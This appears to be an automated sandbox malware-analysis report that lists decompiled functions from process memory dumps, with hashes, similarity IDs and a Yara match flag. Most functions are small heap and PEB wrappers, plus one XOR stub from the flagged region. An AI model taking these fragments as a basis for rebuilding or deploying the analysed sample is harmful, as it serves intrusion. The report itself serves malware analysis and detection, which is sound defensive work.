Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
Instruction ID: 51d447132f6a2ab385cb00c1cedb9cd1b7ea55015026749283602924db34ee2f
Opcode Fuzzy Hash: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
Instruction Fuzzy Hash: A5E0C231284248BBEB226E84CC01F6A7B56DF40BA0F108032FE485A692C6799C91EBC4

Uniqueness

Uniqueness Score: -1.00%

Function 00FDA185, Relevance: .0, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00FDA185() {
				void* __ecx;
				intOrPtr* _t5;

				if( *0x10967e4 >= 0xa) {
					if(_t5 < 0x1096800 || _t5 >= 0x1096900) {
						return L00FC77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t5);
					} else {
						goto L1;
					}
				} else {
					L1:
					return E00FC0010(0x10967e0, _t5);
				}
			}

0x00fda190
0x00fda1a6
0x00fda1c2
0x00000000
0x00000000
0x00000000
0x00fda192
0x00fda192
0x00fda19f
0x00fda19f

Memory Dump Source

Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cc7ee244b19240fb21cea3fd697d6cb8acaa7b3d7558bcddeb8203b602d7db1d
Instruction ID: d151fc6ae737107ac5e3cd73ad141ad8779a02873de1ae7a06c001c8e1e5e127
Opcode Fuzzy Hash: cc7ee244b19240fb21cea3fd697d6cb8acaa7b3d7558bcddeb8203b602d7db1d
Instruction Fuzzy Hash: 6AD05E711610415ACF2E6710DE7AF2A3217FB84750F34484EF1874AAA5EE6A88D5BA0E

Uniqueness

Uniqueness Score: -1.00%

Function 00FD16E0, Relevance: .0, Instructions: 17
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00FD16E0(void* __edx, void* __eflags) {
				void* __ecx;
				void* _t3;

				_t3 = E00FD1710(0x10967e0);
				if(_t3 == 0) {
					_t6 =  *[fs:0x30];
					if( *((intOrPtr*)( *[fs:0x30] + 0x18)) == 0) {
						goto L1;
					} else {
						return L00FC4620(_t6,  *((intOrPtr*)(_t6 + 0x18)), 0, 0x20);
					}
				} else {
					L1:
					return _t3;
				}
			}

0x00fd16e8
0x00fd16ef
0x00fd16f3
0x00fd16fe
0x00000000
0x00fd1700
0x00fd170d
0x00fd170d
0x00fd16f2
0x00fd16f2
0x00fd16f2
0x00fd16f2

Memory Dump Source

Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ead002e14df912125e1e97cbecd769ffe16981e5f8448b5042125ec40335173
Instruction ID: ca1c3c28f5add997670bcf4881e72e0f993f3ab6dffa7ec9c3049a84defb1061
Opcode Fuzzy Hash: 2ead002e14df912125e1e97cbecd769ffe16981e5f8448b5042125ec40335173
Instruction Fuzzy Hash: DBD0A77110010072DF2D5B109C15B143263FB80B91F3C009DF107495D1CFA5DC92F048

Uniqueness

Uniqueness Score: -1.00%

Function 010253CA, Relevance: .0, Instructions: 16
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E010253CA(void* __ebx) {
				intOrPtr _t7;
				void* _t13;
				void* _t14;
				intOrPtr _t15;
				void* _t16;

				_t13 = __ebx;
				if( *((char*)(_t16 - 0x65)) != 0) {
					E00FBEB70(_t14,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					_t7 =  *((intOrPtr*)(_t16 - 0x64));
					_t15 =  *((intOrPtr*)(_t16 - 0x6c));
				}
				if(_t15 != 0) {
					L00FC77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13, _t15);
					return  *((intOrPtr*)(_t16 - 0x64));
				}
				return _t7;
			}

0x010253ca
0x010253ce
0x010253d9
0x010253de
0x010253e1
0x010253e1
0x010253e6
0x010253f3
0x00000000
0x010253f8
0x010253fb

Memory Dump Source

Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
Instruction ID: 7e8569d3592aaf695ea5f06b7e81fb4e76ff9f2595107b80acb05bd9c169111c
Opcode Fuzzy Hash: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
Instruction Fuzzy Hash: 0FE08C319047849BCF12EB49CA51F8EBBF5FF84B00F144048B0085B621C628AC00CB00

Uniqueness

Uniqueness Score: -1.00%

Function 0040C3D5, Relevance: .0, Instructions: 14
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040C3D5(void* __eax, void* __edx) {
				void* _t8;
				void* _t13;

				_t8 = __edx;
				 *(_t13 + 0x69037e5f) =  *(_t13 + 0x69037e5f) ^ 0x000000b0;
			}

0x0040c3d5
0x0040c3d5

Memory Dump Source

Source File: 00000003.00000002.377717750.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f08f7984fdd6cb72fe2d48304e271844bd6bb5caeaae4b904ec17a448ed207dd
Instruction ID: a0641b6fb7822f1adde7f3469c45e1827f28e75535f3bfb30fc8cf062aaa29bc
Opcode Fuzzy Hash: f08f7984fdd6cb72fe2d48304e271844bd6bb5caeaae4b904ec17a448ed207dd
Instruction Fuzzy Hash: 01C08C37B0909E8146218C4D2A40078EB14808713AA8833A28E58B71E68202C02500CD

Uniqueness

Uniqueness Score: -1.00%

Function 00FBAAB0, Relevance: .0, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00FBAAB0() {
				intOrPtr* _t4;

				_t4 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t4 != 0) {
					if( *_t4 == 0) {
						goto L1;
					} else {
						return  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x1e;
					}
				} else {
					L1:
					return 0x7ffe0030;
				}
			}

0x00fbaab6
0x00fbaabb
0x0100a442
0x00000000
0x0100a448
0x0100a454
0x0100a454
0x00fbaac1
0x00fbaac1
0x00fbaac6
0x00fbaac6

Memory Dump Source

Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
Instruction ID: 67f94dac4ea8d62913e4dea8023791e1a2db224a137652be6331db543aa5224a
Opcode Fuzzy Hash: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
Instruction Fuzzy Hash: 3FD0E939752A80CFD657CB1DC954B5577A8BB44B44FC504D0E541CBB62E62CDD44CA10

Uniqueness

Uniqueness Score: -1.00%

Function 00FD35A1, Relevance: .0, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00FD35A1(void* __eax, void* __ebx, void* __ecx) {
				void* _t6;
				void* _t10;
				void* _t11;

				_t10 = __ecx;
				_t6 = __eax;
				if( *((intOrPtr*)(_t11 - 0x34)) >= 0 && __ebx != 0) {
					 *((intOrPtr*)(__ecx + 0x294)) =  *((intOrPtr*)(__ecx + 0x294)) + 1;
				}
				if( *((char*)(_t11 - 0x1a)) != 0) {
					return E00FBEB70(_t10,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				}
				return _t6;
			}

0x00fd35a1
0x00fd35a1
0x00fd35a5
0x00fd35ab
0x00fd35ab
0x00fd35b5
0x00000000
0x00fd35c1
0x00fd35b7

Memory Dump Source

Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
Instruction ID: 49b7613fd99895906865db0c21d91ef072502dd645a53a60c7848ded5799ec29
Opcode Fuzzy Hash: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
Instruction Fuzzy Hash: 0BD0C73195118699DB51AF50E5147A87773BB00314F5C1057954645652C3394F59F603

Uniqueness

Uniqueness Score: -1.00%

Function 00FADB40, Relevance: .0, Instructions: 11
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00FADB40() {
				signed int* _t3;
				void* _t5;

				_t3 = L00FC4620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x64);
				if(_t3 == 0) {
					return 0;
				} else {
					 *_t3 =  *_t3 | 0x00000400;
					return _t3;
				}
			}

0x00fadb4d
0x00fadb54
0x00fadb5f
0x00fadb56
0x00fadb56
0x00fadb5c
0x00fadb5c

Memory Dump Source

Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
Instruction ID: b5e544e14b33359580cc32f0bef0205ad0f9a5052f7e9a4e257dedfb37c2056a
Opcode Fuzzy Hash: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
Instruction Fuzzy Hash: 6CC08C70280A01AAEB321F20CE02F0076A4BB42F41F4500A07302DA4F1DB7CEC01F610

Uniqueness

Uniqueness Score: -1.00%

Function 0102A537, Relevance: .0, Instructions: 11
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0102A537(intOrPtr _a4, intOrPtr _a8) {

				return L00FC8E10( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a8, _a4);
			}

0x0102a553

Memory Dump Source

Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
Instruction ID: 46c7d3fab6233aa534f6de219cf3e7ecb63979c245dbe683d40a371e1eb64f5d
Opcode Fuzzy Hash: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
Instruction Fuzzy Hash: 1BC01232080248BBCB126E81CD02F067F2AEB94BA0F008014BA080A5628A36E971EA84

Uniqueness

Uniqueness Score: -1.00%

Function 00FC3A1C, Relevance: .0, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00FC3A1C(intOrPtr _a4) {
				void* _t5;

				return L00FC4620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}

0x00fc3a35

Memory Dump Source

Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
Instruction ID: 3c0d2a13c055e028fbdac4b97c3155b1a630b1762b8d7458884279908b77b76b
Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
Instruction Fuzzy Hash: A2C08C32080248BBC7226E41DD02F01BB29E790B60F000020B6040A5618536EC60E588

Uniqueness

Uniqueness Score: -1.00%

Function 00FAAD30, Relevance: .0, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00FAAD30(intOrPtr _a4) {

				return L00FC77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}

0x00faad49

Memory Dump Source

Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
Instruction ID: 1b5957153dd016740f0624269add7fb12f5605b419c731396c9eca9256551af4
Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
Instruction Fuzzy Hash: 19C08C32080288BBC7126A45CE02F017B29EB90B60F000020B6040A6628936E860E988

Uniqueness

Uniqueness Score: -1.00%

Function 00FB76E2, Relevance: .0, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00FB76E2(void* __ecx) {
				void* _t5;

				if(__ecx != 0 && ( *(__ecx + 0x20) & 0x00000040) == 0) {
					return L00FC77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
				return _t5;
			}

0x00fb76e4
0x00000000
0x00fb76f8
0x00fb76fd

Memory Dump Source

Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
Instruction ID: 25fce1a6b9888c5ccddb8b6a147b6321a9e4702a25d8bfec447d2cbbdab9e4ba
Opcode Fuzzy Hash: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
Instruction Fuzzy Hash: 3FC08C70549BC85AEB2A7709CE26F203751AF48718F48019CBA010D4A2C36CAC02FA08

Uniqueness

Uniqueness Score: -1.00%

Function 00FD36CC, Relevance: .0, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00FD36CC(void* __ecx) {

				if(__ecx > 0x7fffffff) {
					return 0;
				} else {
					return L00FC4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
			}

0x00fd36d2
0x00fd36e8
0x00fd36d4
0x00fd36e5
0x00fd36e5

Memory Dump Source

Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
Instruction ID: 88f3c58e4fc0e7bff9963b8335ba9568ad3f403115d674ea50514a432e56ac33
Opcode Fuzzy Hash: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
Instruction Fuzzy Hash: D9C02B70150440BBD7252F30CE12F14B264F700B31F6803587320455F0D52DEC00F100

Uniqueness

Uniqueness Score: -1.00%

Function 00FC7D50, Relevance: .0, Instructions: 7
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00FC7D50() {
				intOrPtr* _t3;

				_t3 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t3 != 0) {
					return  *_t3;
				} else {
					return _t3;
				}
			}

0x00fc7d56
0x00fc7d5b
0x00fc7d60
0x00fc7d5d
0x00fc7d5d
0x00fc7d5d

Memory Dump Source

Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
Instruction ID: 57654d4c0dc8bfe877652484be62bfe8acfdc18b00c58e8b1c26b681417bc468
Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
Instruction Fuzzy Hash: 1EB09234705A428FCE56EF18C180F1533E8BB44B40F8400D4E801CBA20D229E8009900

Uniqueness

Uniqueness Score: -1.00%

Function 00FD2ACB, Relevance: .0, Instructions: 5
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00FD2ACB() {
				void* _t5;

				return E00FBEB70(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
			}

0x00fd2adc

Memory Dump Source

Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
Instruction ID: 1956759a2ada689be2527f37e9cbc7fba155d1047990a53bb963db9c2120aa3d
Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
Instruction Fuzzy Hash: 49B01232C10440CFCF02EF40CA10B997331FB40750F058490A00227931C22CAC11DF40

Uniqueness

Uniqueness Score: -1.00%

Function 00FE98A0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6cb2f353b46267e48404271cc146805b8a005687159f14407a8771c393d6393
Instruction ID: b0e4664bec8be798c1136ca9df918833698761b85bcab9ea316e14bd85e1d0f0
Opcode Fuzzy Hash: d6cb2f353b46267e48404271cc146805b8a005687159f14407a8771c393d6393
Instruction Fuzzy Hash: 2F90026130100802D20261594414616100ADBD1385F92C022E2415556E86658953F172

Uniqueness

Uniqueness Score: -1.00%

Function 00FEB040, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 464fbc2aa7d2edcfc9ba5342bfdec4b7c0c0b6e4cf1289ecfef4012a60215a29
Instruction ID: 4f958340ea1681569968a9261b7b07f90f29b31b5dc907787220068249bc9b80
Opcode Fuzzy Hash: 464fbc2aa7d2edcfc9ba5342bfdec4b7c0c0b6e4cf1289ecfef4012a60215a29
Instruction Fuzzy Hash: 419002A1601144434640B15948044166016ABE1341392C131A1445561D86A88855F2A5

Uniqueness

Uniqueness Score: -1.00%

Function 00FE9820, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 36e1aa6ea2eea786b124d6765a3cec0eee7af7f271cccf105f646dd8a343aeb0
Instruction ID: 6d73b41b3045e89fc21fdbacbbe91fa53c5c1d7432dc9b70608f2e4bc13402f9
Opcode Fuzzy Hash: 36e1aa6ea2eea786b124d6765a3cec0eee7af7f271cccf105f646dd8a343aeb0
Instruction Fuzzy Hash: 3B90027124100802D24171594404616100AABD0381F92C022A1415555F86958A56FAA1

Uniqueness

Uniqueness Score: -1.00%

Function 00FE99D0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b802d386bc0536ab497cbb64c16de2f7879cf0eb3def3ff61432db0e06b8bf2b
Instruction ID: ee8b45629aa161f69ce362615d330390b1b10f27b1ea5c021e5b1dbb428b2d84
Opcode Fuzzy Hash: b802d386bc0536ab497cbb64c16de2f7879cf0eb3def3ff61432db0e06b8bf2b
Instruction Fuzzy Hash: 019002A121100442D2046159440471610469BE1341F52C022A3145555DC5698C61B165

Uniqueness

Uniqueness Score: -1.00%

Function 00FE9950, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 861b5ee9b186f6981eb08ce0f9794fd33f6927d846bc616db66284338bc89c97
Instruction ID: a6ebef68ebebd15017aabc81566063215ce903635f5c1b6256d7183f817fc37e
Opcode Fuzzy Hash: 861b5ee9b186f6981eb08ce0f9794fd33f6927d846bc616db66284338bc89c97
Instruction Fuzzy Hash: EF9002A120140803D2406559480461710069BD0342F52C021A3055556F8A698C51B175

Uniqueness

Uniqueness Score: -1.00%

Function 00FE9A80, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de0fd15744e49a71836dc40837a3501eba7517fae049bb11d20753055cf65f6e
Instruction ID: 5c7a1548105503cd730810be94aedc61196bf0f46d9992fa352f531028e4dcc3
Opcode Fuzzy Hash: de0fd15744e49a71836dc40837a3501eba7517fae049bb11d20753055cf65f6e
Instruction Fuzzy Hash: 4890026120144842D24062594804B1F51069BE1342F92C029A5147555DC9558855B761

Uniqueness

Uniqueness Score: -1.00%

Function 00FE9A10, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8fbc5a29c72ae1e98a96302537cdf817bd63e04fac45f16c7248c83304cd64c6
Instruction ID: 7349a776c22612beaa369dd1d9a7ac59b3bfa6abc57a7aefb372807bf1d5c5a3
Opcode Fuzzy Hash: 8fbc5a29c72ae1e98a96302537cdf817bd63e04fac45f16c7248c83304cd64c6
Instruction Fuzzy Hash: 3E90027120140802D2006159480875710069BD0342F52C021A6155556F86A5C891B571

Uniqueness

Uniqueness Score: -1.00%

Function 00FEA3B0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c9fa141b3a33d0fb8ce0d1b2b890af9b214ad067e2e8b5b9a468fd5f8b959d6
Instruction ID: 316b031c3682785855358430d43b0f1f29ed78af82e8e0b02afceebae445912e
Opcode Fuzzy Hash: 4c9fa141b3a33d0fb8ce0d1b2b890af9b214ad067e2e8b5b9a468fd5f8b959d6
Instruction Fuzzy Hash: 5B90027120144402D2407159844461B6006ABE0341F52C421E1416555D86558856F261

Uniqueness

Uniqueness Score: -1.00%

Function 00FE9B00, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9122c4c4f962a7250b01021b963fe1a105b0331d4b8286f2d0f630ca0975e523
Instruction ID: 442a69b6cf0d632e566933417f19f4fd0b3cd30334433875a4f84e92ef26e93d
Opcode Fuzzy Hash: 9122c4c4f962a7250b01021b963fe1a105b0331d4b8286f2d0f630ca0975e523
Instruction Fuzzy Hash: 6590026124100C02D240715984147171007DBD0741F52C021A1015555E86568965B6F1

Uniqueness

Uniqueness Score: -1.00%

Function 00FE95F0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16004173bcb1ace2ccb162b64c886d0a15670e65551d82914677d4e706370426
Instruction ID: 60da88b44aaff91d7bf78ce966970e5496de0bc9cb1908761828705f5ae733bf
Opcode Fuzzy Hash: 16004173bcb1ace2ccb162b64c886d0a15670e65551d82914677d4e706370426
Instruction Fuzzy Hash: 3390027120100C02D2046159480469610069BD0341F52C021A7015656F96A58891B171

Uniqueness

Uniqueness Score: -1.00%

Function 00FE9560, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 57952a4f5796f9d5740d2cd65fe0a4e8ef6b79a94ec1fb2239a825045ad8c44c
Instruction ID: c7a6e6c5b80e0995f8d84a98c07ee41047bc6a719d46d9ad12ce9136ad7a54c4
Opcode Fuzzy Hash: 57952a4f5796f9d5740d2cd65fe0a4e8ef6b79a94ec1fb2239a825045ad8c44c
Instruction Fuzzy Hash: B4900265221004020245A559060451B1446ABD6391392C025F2407591DC6618865B361

Uniqueness

Uniqueness Score: -1.00%

Function 00FEAD30, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: caca15df7f0c943d15824c4f09d0d704b36816a261d8e79545d67efeeb45b068
Instruction ID: 0b7b12eef070d72e2d26cd52c93f8244765da167ec68ece278bfb6ea157cf872
Opcode Fuzzy Hash: caca15df7f0c943d15824c4f09d0d704b36816a261d8e79545d67efeeb45b068
Instruction Fuzzy Hash: B2900271A05004129240715948146565007ABE0781B56C021A1505555D89948A55B3E1

Uniqueness

Uniqueness Score: -1.00%

Function 00FE9520, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 65dc0238ecf9d2a326cee68dbca4e6305075ebf2d4711bd639b0ed9072b8f9ad
Instruction ID: 90483cf342c75bab8e5ced4ce103c3d704da111494076abc07bd6c2c03049825
Opcode Fuzzy Hash: 65dc0238ecf9d2a326cee68dbca4e6305075ebf2d4711bd639b0ed9072b8f9ad
Instruction Fuzzy Hash: 099002E1201144924600A2598404B1A55069BE0341B52C026E2045561DC5658851F175

Uniqueness

Uniqueness Score: -1.00%

Function 00FE96D0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a7ca42992c2b5ed2d5507fb79855976e2f7061ca583cacb25562b89d55d2086
Instruction ID: def737552a8c8234aa8c4eb6bd71adc70898f2b4a740ed18f73e267d4a8015ff
Opcode Fuzzy Hash: 1a7ca42992c2b5ed2d5507fb79855976e2f7061ca583cacb25562b89d55d2086
Instruction Fuzzy Hash: A390027120100C42D20061594404B5610069BE0341F52C026A1115655E8655C851B561

Uniqueness

Uniqueness Score: -1.00%

Function 00FE9650, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 084ee186a6c06921d40e0f357f3cd28a480f53bffe6b8205008fcdc37975f728
Instruction ID: da542228c26a9e3a8b1fa5d6a1023ce576b1467c509e4be9c15e4072269c23b1
Opcode Fuzzy Hash: 084ee186a6c06921d40e0f357f3cd28a480f53bffe6b8205008fcdc37975f728
Instruction Fuzzy Hash: 4690027120504C42D24071594404A5610169BD0345F52C021A1055695E96658D55F6A1

Uniqueness

Uniqueness Score: -1.00%

Function 00FE9610, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 435242666e8a2a9766447581b42957511a34f4f671ab7dc8691b80b614bdfff9
Instruction ID: c8386f36538f25474650723047e1910df481e76479d5526b371e2f53c82d6c57
Opcode Fuzzy Hash: 435242666e8a2a9766447581b42957511a34f4f671ab7dc8691b80b614bdfff9
Instruction Fuzzy Hash: A690027160500C02D2507159441475610069BD0341F52C021A1015655E87958A55B6E1

Uniqueness

Uniqueness Score: -1.00%

Function 00FE9770, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e9a61bf8cc58479cfbc196597c73f45dc754060f251af94ea748c800b238bf5
Instruction ID: f288d7779d86f6b9262f2b7865686aaeb05bc6c34e0d1ede1a5baff4f3a7168d
Opcode Fuzzy Hash: 0e9a61bf8cc58479cfbc196597c73f45dc754060f251af94ea748c800b238bf5
Instruction Fuzzy Hash: B590026120504842D20065595408A1610069BD0345F52D021A2055596EC6758851F171

Uniqueness

Uniqueness Score: -1.00%

Function 00FEA770, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9012a7ee680d6c36c6a2094ce1f673a62d39bee25627165037fc909aa152c14f
Instruction ID: a5d8e1ddc7c4f72d48d00024feadd4651c5ef350415dfed20b1eae1d7e922f49
Opcode Fuzzy Hash: 9012a7ee680d6c36c6a2094ce1f673a62d39bee25627165037fc909aa152c14f
Instruction Fuzzy Hash: CD90027520504842D60065595804A9710069BD0345F52D421A141559DE86948861F161

Uniqueness

Uniqueness Score: -1.00%

Function 00FE9760, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: afa2aa6cbc433ee161770eea28a5a233043b17648adff360740d288d04a87c2b
Instruction ID: 0401a687bfb9e21138f73e7eeb5457160b128572ac9bb4257cea05583823edd2
Opcode Fuzzy Hash: afa2aa6cbc433ee161770eea28a5a233043b17648adff360740d288d04a87c2b
Instruction Fuzzy Hash: D490027120100803D2006159550871710069BD0341F52D421A1415559ED6968851B161

Uniqueness

Uniqueness Score: -1.00%

